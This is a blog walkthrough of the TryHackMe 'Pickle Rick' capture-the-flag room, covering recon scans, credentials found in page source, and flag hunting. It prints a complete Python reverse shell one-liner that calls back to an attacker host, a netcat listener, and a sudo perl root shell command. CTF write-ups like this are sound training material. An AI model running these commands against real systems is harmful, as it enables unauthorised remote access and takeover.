TryHackMe Walkthrough | Pickle Rick!

A Rick and Morty CTF. Help turn Rick back into a human!

Prerequisites

Before deploying the machine make sure you have you VPN ready.

Now will deploy the machine after the VPN is enabled.

Reconnaissance

Performing a nmap scan we see that we have 2 ports open(22 and 80). So that’s means we have a webpage also.

nmap -sC -sV -p- — min-rate=10000 -oN nmap <Target_IP>

We have a webpage

Checking source code and robots.txt

We get the username in the source code of the page.

In robots.txt we have a string that might be passoword.

Running gobutser and found out the login page.

gobuster dir -u <IP> -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,htm

We get a login page and we use the username and password we found earlier from the source code and the robots.txt

We get an option to input commands and execute them.

on doing an ls the command we see all the files.

Instead of giving commands here, I choose to get a python reverse shell.

Checking if python exists.

And yes it has python3

Now executing our payload.

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<Attacker_IP>”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Before Executing make sure your netcat is listening on the mentioned PORT.

Got the Reverse Shell on port 4444

nc -nlvp 4444

Finding Flags

1st Flag

2nd Flag is inside the /rick directory

Escalating Privileges

Checking the permissions and we find out that we can run all the commands on the system as sudo.

We can see that this user can run everything as sudo user.

I used sudo perl command to become root.

sudo perl -e ‘exec “/bin/sh”;’

3rd Flag.

In the root directory, we find the root flag as 3rd.txt

and we successfully finished the room and helped rick turn back into his natural form.

Leave some Claps if you found this useful.

--

--

--

B.Sc IT Graduate with C.E.H certification currently pursuing Offensive Security (Red Team). Passion for MMA and Kick-boxing & Automobile Enthusiast.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to Create a Simple WordPress Plugin

My road to Certified Kubernetes Security Specialist (CKS)

I Want My MT(v)

The headband didn’t fit on his head

Firebase cloud functions in Ionic 4  —  Complete guide

Firebase cloud functions in Ionic 4 — Complete guide

📣📣 Remember our Listing Day on PancakeSwap: 7th May, 2022 at 15:00 (UTC) ?

This Django is chained!

An introduction to Trust Architectures for connected devices

Write Files From EC2 To S3 In AWS, Programmatically

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Aditya Kumar

Aditya Kumar

B.Sc IT Graduate with C.E.H certification currently pursuing Offensive Security (Red Team). Passion for MMA and Kick-boxing & Automobile Enthusiast.

More from Medium

[HTB] Horizontall Writeup

Flatline THM Walkthrough

[Day 22] Blue Teaming How It Happened | Advent of Cyber 3 (2021)

[Vulnhub] Kioptrix 1 Write-Up